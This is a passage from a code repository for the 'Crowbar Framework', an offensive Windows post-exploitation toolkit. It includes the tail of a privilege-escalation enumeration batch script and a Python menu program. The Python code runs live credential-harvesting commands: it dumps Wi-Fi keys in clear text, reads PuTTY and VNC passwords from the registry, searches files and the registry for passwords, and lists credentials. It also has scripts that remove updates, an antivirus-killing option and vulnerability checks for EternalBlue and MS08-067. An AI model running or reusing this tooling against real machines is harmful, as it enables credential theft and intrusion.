Networking 23 | echo 5 - Processes 24 | echo 6 - User Info 25 | echo 7 - Return to the Crowbar Framework 26 | echo. 27 | SET /P C=Select^> 28 | echo. 29 | IF %C%==1 GOTO ALL 30 | IF %C%==2 GOTO OS 31 | IF %C%==3 GOTO STORAGE 32 | IF %C%==4 GOTO NETWORK 33 | IF %C%==5 GOTO PROCESSES 34 | IF %C%==6 GOTO USERS 35 | IF %C%==7 GOTO EXIT 36 | 37 | :ALL 38 | echo WinPrivEsc >> report.txt 39 | echo Windows Enumeration and Privilege Escalation Script>> report.txt 40 | echo www.joshruppe.com ^| Twitter: @josh_ruppe>> report.txt 41 | echo.>> report.txt 42 | echo Report generated: >> report.txt 43 | echo. >> report.txt 44 | for /F "tokens=* USEBACKQ" %%F IN ('Date') do ( 45 | set Date=%%F 46 | echo %Date% >> report.txt 47 | ) 48 | echo __________________________ >> report.txt 49 | echo. >> report.txt 50 | echo OPERATING SYSTEM >> report.txt 51 | echo __________________________>> report.txt 52 | echo.>> report.txt 53 | echo [++OS Name]>> report.txt 54 | echo.>> report.txt 55 | for /F "tokens=3-7" %%a IN ('find /i "OS Name:" systeminfo.txt') do set Name=%%a %%b %%c %%d %%e>> report.txt 56 | echo %Name%>> report.txt 57 | echo.>> report.txt 58 | echo [++OS Version]>> report.txt 59 | echo.>> report.txt 60 | for /F "tokens=3-6" %%a IN ('findstr /B /C:"OS Version:" systeminfo.txt') do set Version=%%a %%b %%c %%d>> report.txt 61 | echo %Version%>> report.txt 62 | echo.>> report.txt 63 | echo.>> report.txt 64 | echo [++System Architecture]>> report.txt 65 | echo.>> report.txt 66 | for /F "tokens=3-4" %%a IN ('findstr /B /C:"System Type:" systeminfo.txt') do set Type=%%a %%b>> report.txt 67 | echo %Type%>> report.txt 68 | echo.>> report.txt 69 | echo [++System Boot Time]>> report.txt 70 | echo.>> report.txt 71 | for /F "tokens=4-6" %%a IN ('findstr /B /C:"System Boot Time:" systeminfo.txt') do set UpTime=%%a %%b %%c>> report.txt 72 | echo %UpTime%>> report.txt 73 | echo.>> report.txt 74 | echo [++Page File Location(s)]>> report.txt 75 | echo.>> report.txt 76 | for /F "tokens=4" %%a IN ('findstr /B /C:"Page File Location(s):" systeminfo.txt') do set Page=%%a>> report.txt 77 | echo %Page%>> report.txt 78 | echo.>> report.txt 79 | echo [++Hotfix(s) Installed]>> report.txt 80 | echo.>> report.txt 81 | setlocal enabledelayedexpansion 82 | for /F "tokens=2" %%a IN ('findstr /v ".TXT" hotfix.txt') do ( 83 | set Hot=%%~a 84 | echo !Hot!>> report.txt 85 | ) 86 | echo.>> report.txt 87 | echo [++Hosts File]>> report.txt 88 | echo.>> report.txt 89 | more c:\WINDOWS\System32\drivers\etc\hosts>> report.txt 90 | echo.>> report.txt 91 | echo [++Networks File]>> report.txt 92 | echo.>> report.txt 93 | more c:\WINDOWS\System32\drivers\etc\networks>> report.txt 94 | echo.>> report.txt 95 | echo [++Running Services]>> report.txt 96 | echo.>> report.txt 97 | net start>> report.txt 98 | echo.>> report.txt 99 | echo.>> report.txt 100 | echo _________________>> report.txt 101 | echo.>> report.txt 102 | echo STORAGE >> report.txt 103 | echo _________________>> report.txt 104 | echo.>> report.txt 105 | echo [++Physical Drives]>> report.txt 106 | net share>> report.txt 107 | echo.>> report.txt 108 | echo [++Network Drives]>> report.txt 109 | echo.>> report.txt 110 | net use>> report.txt 111 | echo.>> report.txt 112 | echo.>> report.txt 113 | echo ____________________>> report.txt 114 | echo.>> report.txt 115 | echo NETWORKING >> report.txt 116 | echo ____________________>> report.txt 117 | echo.>> report.txt 118 | echo [++ICONFIG]>> report.txt 119 | ipconfig /allcompartments /all>> report.txt 120 | echo.>> report.txt 121 | echo [++MAC Addresses]>> report.txt 122 | getmac>> report.txt 123 | echo.>> report.txt 124 | echo [++Route]>> report.txt 125 | echo.>> report.txt 126 | route PRINT>> report.txt 127 | echo.>> report.txt 128 | echo [++Netstat]>> report.txt 129 | netstat -ano>> report.txt 130 | echo.>> report.txt 131 | echo [++ARP]>> report.txt 132 | arp -a>> report.txt 133 | echo.>> report.txt 134 | echo [++Firewall Configuration]>> report.txt 135 | netsh firewall show config>> report.txt 136 | echo [++Domain]>> report.txt 137 | echo.>> report.txt 138 | set userdomain>> report.txt 139 | echo.>> report.txt 140 | echo.>> report.txt 141 | echo ___________________>> report.txt 142 | echo.>> report.txt 143 | echo PROCESSES >> report.txt 144 | echo ___________________>> report.txt 145 | echo.>> report.txt 146 | echo [++Tasklist]>> report.txt 147 | tasklist /v>> report.txt 148 | echo.>> report.txt 149 | echo [++Drivers Installed]>> report.txt 150 | driverquery /v>> report.txt 151 | echo.>> report.txt 152 | echo.>> report.txt 153 | echo ___________________>> report.txt 154 | echo.>> report.txt 155 | echo USER INFO >> report.txt 156 | echo ___________________>> report.txt 157 | echo.>> report.txt 158 | echo [++Current User]>> report.txt 159 | echo.>> report.txt 160 | whoami>> report.txt 161 | echo.>> report.txt 162 | echo [++All Users]>> report.txt 163 | net users>> report.txt 164 | echo.>> report.txt 165 | echo [++User Groups]>> report.txt 166 | net localgroup>> report.txt 167 | echo.>> report.txt 168 | echo Done, check report.txt 169 | echo. 170 | del systeminfo.txt 171 | del hotfix.txt 172 | EXIT /B 173 | 174 | :OS 175 | echo __________________________ 176 | echo. 177 | echo OPERATING SYSTEM 178 | echo __________________________ 179 | echo. 180 | echo [++OS Name] 181 | echo. 182 | for /F "tokens=3-7" %%a IN ('find /i "OS Name:" systeminfo.txt') do set Name=%%a %%b %%c %%d %%e 183 | echo %Name% 184 | echo. 185 | echo [++OS Version] 186 | echo. 187 | for /F "tokens=3-6" %%a IN ('findstr /B /C:"OS Version:" systeminfo.txt') do set Version=%%a %%b %%c %%d 188 | echo %Version% 189 | echo. 190 | echo [++System Architecture] 191 | echo. 192 | for /F "tokens=3-4" %%a IN ('findstr /B /C:"System Type:" systeminfo.txt') do set Type=%%a %%b 193 | echo %Type% 194 | echo. 195 | echo [++System Boot Time] 196 | echo. 197 | for /F "tokens=4-6" %%a IN ('findstr /B /C:"System Boot Time:" systeminfo.txt') do set UpTime=%%a %%b %%c 198 | echo %UpTime% 199 | echo. 200 | echo [++Page File Location(s)] 201 | echo. 202 | for /F "tokens=4" %%a IN ('findstr /B /C:"Page File Location(s):" systeminfo.txt') do set Page=%%a 203 | echo %Page% 204 | echo. 205 | echo [++Hotfix(s) Installed] 206 | echo. 207 | setlocal enabledelayedexpansion 208 | for /F "tokens=2" %%a IN ('findstr /v ".TXT" hotfix.txt') do ( 209 | set Hot=%%~a 210 | echo !Hot! 211 | ) 212 | echo. 213 | echo [++Hosts File] 214 | echo. 215 | more c:\WINDOWS\System32\drivers\etc\hosts 216 | echo. 217 | echo [++Networks File] 218 | echo. 219 | more c:\WINDOWS\System32\drivers\etc\networks 220 | echo. 221 | echo [++Running Services] 222 | echo. 223 | net start 224 | echo. 225 | del systeminfo.txt 226 | del hotfix.txt 227 | EXIT /B 228 | 229 | :STORAGE 230 | echo _________________ 231 | echo. 232 | echo STORAGE 233 | echo _________________ 234 | echo. 235 | echo [++Physical Drives] 236 | net share 237 | echo. 238 | echo [++Network Drives] 239 | echo. 240 | net use 241 | del systeminfo.txt 242 | del hotfix.txt 243 | EXIT /B 244 | 245 | :NETWORK 246 | echo ____________________ 247 | echo. 248 | echo NETWORKING 249 | echo ____________________ 250 | echo. 251 | echo [++ICONFIG] 252 | ipconfig /allcompartments /all 253 | echo. 254 | echo [++MAC Addresses] 255 | getmac 256 | echo. 257 | echo [++Route] 258 | echo. 259 | route PRINT 260 | echo. 261 | echo [++Netstat] 262 | netstat -ano 263 | echo. 264 | echo [++ARP] 265 | arp -a 266 | echo. 267 | echo [++Firewall Configuration] 268 | netsh firewall show config 269 | echo [++Domain] 270 | echo. 271 | set userdomain 272 | echo. 273 | del systeminfo.txt 274 | del hotfix.txt 275 | EXIT /B 276 | 277 | :PROCESSES 278 | echo ___________________ 279 | echo. 280 | echo PROCESSES 281 | echo ___________________ 282 | echo. 283 | echo [++Tasklist] 284 | tasklist /v 285 | echo. 286 | echo [++Drivers Installed] 287 | driverquery /vw 288 | del systeminfo.txt 289 | del hotfix.txt 290 | EXIT /B 291 | 292 | :USERS 293 | echo ___________________ 294 | echo. 295 | echo USER INFO 296 | echo ___________________ 297 | echo. 298 | echo [++Current User] 299 | echo. 300 | whoami 301 | echo. 302 | echo [++All Users] 303 | net users 304 | echo. 305 | echo [++User Groups] 306 | net localgroup 307 | echo. 308 | del systeminfo.txt 309 | del hotfix.txt 310 | EXIT /B 311 | 312 | :EXIT 313 | del systeminfo.txt 314 | del hotfix.txt 315 | EXIT /B -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | # Crowbar Framework 2 | # 4/25/2021 3 | # Made by https://github.com/0x1CA3 4 | 5 | import os 6 | import ctypes 7 | import datetime 8 | import shutil 9 | import pyautogui 10 | import winreg 11 | import socket 12 | import platform 13 | import psutil 14 | import requests 15 | import subprocess 16 | from datetime import datetime 17 | from getmac import get_mac_address 18 | 19 | def functionclear(): 20 | if os.name == "nt": 21 | os.system("cls") 22 | else: 23 | os.system("clear") 24 | functionclear() 25 | 26 | ctypes.windll.kernel32.SetConsoleTitleW("[Crowbar Framework]") 27 | beginmen = socket.gethostname() 28 | 29 | ipurl = requests.get("https://ipv4bot.whatismyipaddress.com/").text 30 | iptrack = requests.get("https://vpnapi.io/api/").text 31 | 32 | # registry scanners from the old crowbar i made 33 | 34 | def reg(): 35 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE) 36 | 37 | regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion") 38 | 39 | for n in range(20): 40 | try: 41 | x = winreg.EnumValue(regkey, n) 42 | print(x) 43 | except: 44 | break 45 | 46 | 47 | def reg1(): 48 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER) 49 | 50 | regkey = winreg.OpenKey(access_reg, r"Environment") 51 | 52 | for n in range(20): 53 | try: 54 | x = winreg.EnumValue(regkey, n) 55 | print(x) 56 | except: 57 | break 58 | 59 | def reg2(): 60 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER) 61 | 62 | regkey = winreg.OpenKey(access_reg, r"Volatile Environment") 63 | 64 | for n in range(20): 65 | try: 66 | x = winreg.EnumValue(regkey, n) 67 | print(x) 68 | except: 69 | break 70 | 71 | 72 | def reg3(): 73 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE) 74 | 75 | regkey = winreg.OpenKey(access_reg, r"HARDWARE\DESCRIPTION\SYSTEM") 76 | 77 | for n in range(20): 78 | try: 79 | x = winreg.EnumValue(regkey, n) 80 | print(x) 81 | except: 82 | break 83 | 84 | 85 | def reg4(): 86 | access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE) 87 | 88 | regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform") 89 | 90 | for n in range(20): 91 | try: 92 | x = winreg.EnumValue(regkey, n) 93 | print(x) 94 | except: 95 | break 96 | 97 | 98 | machine1 = platform.machine() 99 | version1 = platform.version() 100 | platform1 = platform.platform() 101 | uname1 = platform.uname() 102 | system1 = platform.system() 103 | process1 = platform.processor() 104 | computername = socket.gethostname() 105 | localipaddress = socket.gethostbyname(computername) 106 | boottime = datetime.fromtimestamp(psutil.boot_time()) 107 | 108 | 109 | def leavescripts(): 110 | scripts() 111 | 112 | # credit to https://github.com/d4vinci for some of the powershell scripts 113 | 114 | def scripts(): 115 | while True: 116 | scripts = input("\nScripts (scripts/)\n |==> ") 117 | if scripts == "help": 118 | print(''' 119 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 120 | | help - Prints out help commands. | 121 | | list - Lists all the scripts. | 122 | | use (script number) - Selects and loads specified utility. Example: use 1 | 123 | | hailmary - Runs all scripts against the target. [Not Recommended] | 124 | | clear - Clears the screen. | 125 | | back - Goes back to the Crowbar menu. | 126 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 127 | ''') 128 | elif scripts == "list": 129 | print(''' 130 | +———— Scripts ——————————————————————————————————————————————————————————————————— Description ————————————————————————————————————————————————————+ 131 | | 1. scripts/net/grabwifi A script that dumps the Wi-Fi SSID. | 132 | | 2. scripts/sysdump A script that dumps basic system information. | 133 | | 3. scripts/regdump A script that dumps information from the registry. | 134 | | 4. scripts/AVKILL Script that attempts to kill the targets AntiVirus. | 135 | | 5. scripts/net/dumpwifipass Script that dumps Wi-Fi passwords. | 136 | | 6. scripts/vuln/eternal_blue [Nmap must be installed on target computer] Checks if target machine is vulnerable to "Eternal Blue". | 137 | | 7. scripts/vuln/netapi [Nmap must be installed on target computer] Checks if target machine is vulnerable to "MS08-067". [Netapi] | 138 | | 8. scripts/getusers Gets all users registered on the target machine. | 139 | | 9. scripts/cmd/read_firewall_config Gathers firewall information. | 140 | | 10. scripts/cmd/read_registry_putty_sessions Gather information and passwords from putty sessions. | 141 | | 11. scripts/cmd/search_for_passwords Searches for passwords on the target machine. | 142 | | 12. scripts/cmd/search_registry_for_passwords_cu Searches registry for passwords. | 143 | | 13. scripts/cmd/read_registry_vnc_passwords Searches the registry for VNC passwords. | 144 | | 14. scripts/cmd/read_registry_snmp_key Query machine snmp key in the registry to get snmp parameters. | 145 | | 15. scripts/cmd/read_registry_run_key Query the run key for the current user on the target machine. | 146 | | 16. scripts/cmd/list_network_shares Lists all network shares. | 147 | | 17. scripts/cmd/list_localgroups Lists the local groups. | 148 | | 18. scripts/cmd/list_drives List all drives. | 149 | | 19. scripts/cmd/get_snmp_config Fetches current SNMP Configuration. | 150 | | 20. scripts/cmd/list_user_privileges Lists current user privileges. | 151 | | 21. scripts/cmd/read_services Reads services with wmic. | 152 | | 22. scripts/cmd/list_installed_updates Lists installed updates. | 153 | | 23. scripts/powershell/list_unqouted_services Querying wmi to search for unquoted service paths. | 154 | | 24. scripts/powershell/list_routing_tables Lists current routing table. | 155 | | 25. scripts/powershell/list_network_interfaces Lists network interface. | 156 | | 26. scripts/powershell/list_installed_programs_using_registry Lists installed programs using the registry. | 157 | | 27. scripts/powershell/list_installed_programs_using_folders Lists installed programs using folders. | 158 | | 28. scripts/powershell/list_arp_tables Lists ARP tables. | 159 | | 29. scripts/powershell/get_iis_config Fetches IIS config. | 160 | | 30. scripts/powershell/sensitive_data_search A script that searches for files with sensitive data. | 161 | | 31. scripts/powershell/list_credentials A script that lists credentials. | 162 | | 32. scripts/powershell/remove_update [Nishang] A payload that removes updates for the target machine. | 163 | | 33. scripts/powershell/get_unconstrained [Nishang] Script that finds machines with Unconstrained Delegation. | 164 | | 34. scripts/extra/cmd/get_architecture Gets the processor architecture. | 165 | | 35. scripts/extra/cmd/list_antivirus Lists installed AV's on the target machine. | 166 | +—————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 167 | ''') 168 | elif scripts == "clear": 169 | functionclear() 170 | elif scripts == "hailmary": 171 | os.system("Netsh WLAN show profiles") 172 | print(f''' 173 | +——— Basic System Information ———————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 174 | | Machine: {machine1} | 175 | | Version: {version1} | 176 | | Platform: {platform1} | 177 | | System: {system1} | 178 | | Computer Name: {computername} | 179 | | Local IP: {localipaddress} | 180 | | Last Boot Time: {boottime} | 181 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 182 | ''') 183 | print(''' 184 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion 185 | ———————————————————————————————————————————————————————————————''') 186 | reg() 187 | print(''' 188 | Information from \Environment 189 | ———————————————————————————————————————————————————————————————''') 190 | reg1() 191 | print(''' 192 | Information from HKEY_CURRENT_USER\Volatile Environment 193 | ———————————————————————————————————————————————————————————————''') 194 | reg2() 195 | print(''' 196 | Information from HARDWARE\DESCRIPTION\SYSTEM 197 | ———————————————————————————————————————————————————————————————''') 198 | reg3() 199 | print(''' 200 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform 201 | ———————————————————————————————————————————————————————————————''') 202 | reg4() 203 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 {}".format(localipaddress)) 204 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 {}".format(localipaddress)) 205 | os.system("NET users") 206 | os.system("netsh firewall show state & netsh firewall show config") 207 | os.system("reg query 'HKCU\Software\SimonTatham\PuTTY\Sessions'") 208 | os.system("findstr /si password *.xml *.ini *.txt *.config") 209 | os.system('''REG QUERY HKCU /F "password" /t REG_SZ /S /K''') 210 | os.system('''reg query "HKCU\Software\ORL\WinVNC3\Password"''') 211 | os.system('''reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"''') 212 | os.system("reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run") 213 | os.system("net share") 214 | os.system("net localgroup") 215 | os.system("wmic logicaldisk get caption,description,providername") 216 | os.system("reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s") 217 | os.system("whoami /priv") 218 | os.system("wmic service list brief") 219 | os.system("wmic qfe") 220 | subprocess.call('''powershell.exe Get-Content scripts/unquoteservice.ps1 | PowerShell.exe -noprofile -''', shell=True) 221 | subprocess.call('''powershell.exe Get-Content scripts/routingtable.ps1 | PowerShell.exe -noprofile -''', shell=True) 222 | subprocess.call('''powershell.exe Get-Content scripts/listnetworkinter.ps1 | PowerShell.exe -noprofile -''', shell=True) 223 | subprocess.call('''powershell.exe Get-Content scripts/listprogramsreg.ps1 | PowerShell.exe -noprofile -''', shell=True) 224 | subprocess.call('''powershell.exe Get-Content scripts/listprogramsfol.ps1 | PowerShell.exe -noprofile -''', shell=True) 225 | subprocess.call('''powershell.exe Get-Content scripts/listarptables.ps1 | PowerShell.exe -noprofile -''', shell=True) 226 | subprocess.call('''powershell.exe Get-Content scripts/iisconfig.ps1 | PowerShell.exe -noprofile -''', shell=True) 227 | subprocess.call('''powershell.exe Get-Content scripts/sensitive_data_search.ps1 | PowerShell.exe -noprofile -''', shell=True) 228 | subprocess.call('''powershell.exe Get-Content scripts/listcredentials.ps1 | PowerShell.exe -noprofile -''', shell=True) 229 | subprocess.call('''powershell.exe Get-Content scripts/removeupdate.ps1 | PowerShell.exe -noprofile -''', shell=True) 230 | subprocess.call('''(cd scripts) && (PowerShell.exe -ExecutionPolicy Bypass -File ./getunconstrained.ps1)''', shell=True) 231 | os.system("wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%") 232 | os.system("cd scripts && list_antivirus.bat") 233 | print(''' 234 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 235 | | Hail mary finished! | 236 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 237 | ''') 238 | elif scripts == "back": 239 | crowbarbanner() 240 | mainmenuinput() 241 | elif scripts == "use 1": 242 | while True: 243 | scriptsgrabwifi = input("\nScripts (scripts/net/grabwifi)\n |==> ") 244 | if scriptsgrabwifi == "help": 245 | print(''' 246 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 247 | | help - Prints out help commands. | 248 | | dump - Dumps all Wi-Fi SSID's. | 249 | | clear - Clears the screen. | 250 | | back - goes back to the 'Scripts' directory. | 251 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 252 | ''') 253 | elif scriptsgrabwifi == "dump": 254 | os.system("Netsh WLAN show profiles") 255 | elif scriptsgrabwifi == "clear": 256 | functionclear() 257 | elif scriptsgrabwifi == "back": 258 | leavescripts() 259 | else: 260 | print("Wrong Command!") 261 | elif scripts == "use 2": 262 | while True: 263 | scriptssysdump = input("\nScripts (scripts/sysdump)\n |==> ") 264 | if scriptssysdump == "help": 265 | print(''' 266 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 267 | | help - Prints out help commands. | 268 | | dump - Dumps basic system information. | 269 | | clear - Clears the screen. | 270 | | back - goes back to the 'Scripts' directory. | 271 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 272 | ''') 273 | elif scriptssysdump == "dump": 274 | print(f''' 275 | +——— Basic System Information ———————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 276 | | Machine: {machine1} | 277 | | Version: {version1} | 278 | | Platform: {platform1} | 279 | | System: {system1} | 280 | | Computer Name: {computername} | 281 | | Local IP: {localipaddress} | 282 | | Last Boot Time: {boottime} | 283 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 284 | ''') 285 | elif scriptssysdump == "clear": 286 | functionclear() 287 | elif scriptssysdump == "back": 288 | leavescripts() 289 | else: 290 | print("Wrong Command!") 291 | elif scripts == "use 3": 292 | while True: 293 | scriptsregdump = input("\nScripts (scripts/regdump)\n |==> ") 294 | if scriptsregdump == "help": 295 | print(''' 296 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 297 | | help - Prints out help commands. | 298 | | dump - Dumps information from the registry. | 299 | | clear - Clears the screen. | 300 | | back - goes back to the 'Scripts' directory. | 301 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 302 | ''') 303 | elif scriptsregdump == "dump": 304 | print(''' 305 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion 306 | ———————————————————————————————————————————————————————————————''') 307 | reg() 308 | print(''' 309 | Information from \Environment 310 | ———————————————————————————————————————————————————————————————''') 311 | reg1() 312 | print(''' 313 | Information from HKEY_CURRENT_USER\Volatile Environment 314 | ———————————————————————————————————————————————————————————————''') 315 | reg2() 316 | print(''' 317 | Information from HARDWARE\DESCRIPTION\SYSTEM 318 | ———————————————————————————————————————————————————————————————''') 319 | reg3() 320 | print(''' 321 | Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform 322 | ———————————————————————————————————————————————————————————————''') 323 | reg4() 324 | elif scriptsregdump == "clear": 325 | functionclear() 326 | elif scriptsregdump == "back": 327 | leavescripts() 328 | else: 329 | print("Wrong Command!") 330 | elif scripts == "use 4": 331 | print(''' 332 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 333 | | For the safety of the machine, this script will not be executed. | 334 | | However, you can access the file in the '/scripts' folder. | 335 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 336 | ''') 337 | elif scripts == "use 5": 338 | while True: 339 | scriptswifipass = input("\nScripts (scripts/net/dumpwifipass)\n |==> ") 340 | if scriptswifipass == "help": 341 | print(''' 342 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 343 | | help - Prints out help commands. | 344 | | dump - Dumps Wi-Fi password. | 345 | | clear - Clears the screen. | 346 | | back - goes back to the 'Scripts' directory. | 347 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 348 | ''') 349 | elif scriptswifipass == "dump": 350 | wifissid = input("\nScripts (Enter the network SSID which you want to dump passwords from)\n |==> ") 351 | os.system("NETSH WLAN SHOW PROFILE {} KEY=CLEAR".format(wifissid)) 352 | elif scriptswifipass == "clear": 353 | functionclear() 354 | elif scriptswifipass == "back": 355 | leavescripts() 356 | elif scripts == "use 6": 357 | while True: 358 | scriptseternal = input("\nScripts (scripts/vuln/eternal_blue)\n |==> ") 359 | if scriptseternal == "help": 360 | print(''' 361 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 362 | | help - Prints out help commands. | 363 | | vuln - Checks if the target computer is vulnerable. | 364 | | clear - Clears the screen. | 365 | | back - goes back to the 'Scripts' directory. | 366 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 367 | ''') 368 | elif scriptseternal == "vuln": 369 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 {}".format(localipaddress)) 370 | elif scriptseternal == "clear": 371 | functionclear() 372 | elif scriptseternal == "back": 373 | leavescripts() 374 | else: 375 | print("Wrong Command!") 376 | elif scripts == "use 7": 377 | while True: 378 | scriptsnetapi = input("\nScripts (scripts/vuln/netapi)\n |==> ") 379 | if scriptsnetapi == "help": 380 | print(''' 381 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 382 | | help - Prints out help commands. | 383 | | vuln - Checks if the target computer is vulnerable. | 384 | | clear - Clears the screen. | 385 | | back - goes back to the 'Scripts' directory. | 386 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 387 | ''') 388 | elif scriptsnetapi == "vuln": 389 | os.system("nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 {}".format(localipaddress)) 390 | elif scriptsnetapi == "clear": 391 | functionclear() 392 | elif scriptsnetapi == "back": 393 | leavescripts() 394 | else: 395 | print("Wrong Command!") 396 | elif scripts == "use 8": 397 | while True: 398 | scriptsgetuser = input("\nScripts (scripts/cmd/getusers)\n |==> ") 399 | if scriptsgetuser == "help": 400 | print(''' 401 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 402 | | help - Prints out help commands. | 403 | | run - Runs the script against the host machine. | 404 | | clear - Clears the screen. | 405 | | back - goes back to the 'Scripts' directory. | 406 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 407 | ''') 408 | elif scriptsgetuser == "run": 409 | os.system("NET users") 410 | elif scriptsgetuser == "clear": 411 | functionclear() 412 | elif scriptsgetuser == "back": 413 | leavescripts() 414 | else: 415 | print("Wrong Command!") 416 | elif scripts == "use 9": 417 | while True: 418 | scriptsfirewallcfg = input("\nScripts (scripts/cmd/read_firewall_config)\n |==> ") 419 | if scriptsfirewallcfg == "help": 420 | print(''' 421 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 422 | | help - Prints out help commands. | 423 | | run - Runs the script against the host machine. | 424 | | clear - Clears the screen. | 425 | | back - goes back to the 'Scripts' directory. | 426 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 427 | ''') 428 | elif scriptsfirewallcfg == "run": 429 | os.system("netsh firewall show state & netsh firewall show config") 430 | elif scriptsfirewallcfg == "clear": 431 | functionclear() 432 | elif scriptsfirewallcfg == "back": 433 | leavescripts() 434 | else: 435 | print("Wrong Command!") 436 | elif scripts == "use 10": 437 | while True: 438 | scriptsreadregputty = input("\nScripts (scripts/cmd/read_registry_putty_sessions)\n |==> ") 439 | if scriptsreadregputty == "help": 440 | print(''' 441 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 442 | | help - Prints out help commands. | 443 | | run - Runs the script against the host machine. | 444 | | clear - Clears the screen. | 445 | | back - goes back to the 'Scripts' directory. | 446 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 447 | ''') 448 | elif scriptsreadregputty == "run": 449 | os.system("reg query 'HKCU\Software\SimonTatham\PuTTY\Sessions'") 450 | elif scriptsreadregputty == "clear": 451 | functionclear() 452 | elif scriptsreadregputty == "back": 453 | leavescripts() 454 | else: 455 | print("Wrong Command!") 456 | elif scripts == "use 11": 457 | while True: 458 | scriptssearchpass = input("\nScripts (scripts/cmd/search_for_passwords)\n |==> ") 459 | if scriptssearchpass == "help": 460 | print(''' 461 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 462 | | help - Prints out help commands. | 463 | | run - Runs the script against the host machine. | 464 | | clear - Clears the screen. | 465 | | back - goes back to the 'Scripts' directory. | 466 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 467 | ''') 468 | elif scriptssearchpass == "run": 469 | os.system("findstr /si password *.xml *.ini *.txt *.config") 470 | elif scriptssearchpass == "clear": 471 | functionclear() 472 | elif scriptssearchpass == "back": 473 | leavescripts() 474 | else: 475 | print("Wrong Command!") 476 | elif scripts == "use 12": 477 | while True: 478 | scriptsregisterypasswordcu = input("\nScripts (scripts/cmd/search_registry_for_passwords_cu)\n |==> ") 479 | if scriptsregisterypasswordcu == "help": 480 | print(''' 481 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 482 | | help - Prints out help commands. | 483 | | run - Runs the script against the host machine. | 484 | | clear - Clears the screen. | 485 | | back - goes back to the 'Scripts' directory. | 486 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 487 | ''') 488 | elif scriptsregisterypasswordcu == "run": 489 | os.system('''REG QUERY HKCU /F "password" /t REG_SZ /S /K''') 490 | elif scriptsregisterypasswordcu == "clear": 491 | functionclear() 492 | elif scriptsregisterypasswordcu == "back": 493 | leavescripts() 494 | else: 495 | print("Wrong Command!") 496 | elif scripts == "use 13": 497 | while True: 498 | scriptsreadvncpass = input("\nScripts (scripts/cmd/read_registry_vnc_passwords)\n |==> ") 499 | if scriptsreadvncpass == "help": 500 | print(''' 501 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 502 | | help - Prints out help commands. | 503 | | run - Runs the script against the host machine. | 504 | | clear - Clears the screen. | 505 | | back - goes back to the 'Scripts' directory. | 506 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 507 | ''') 508 | elif scriptsreadvncpass == "run": 509 | os.system('''reg query "HKCU\Software\ORL\WinVNC3\Password"''') 510 | elif scriptsreadvncpass == "clear": 511 | functionclear() 512 | elif scriptsreadvncpass == "back": 513 | leavescripts() 514 | else: 515 | 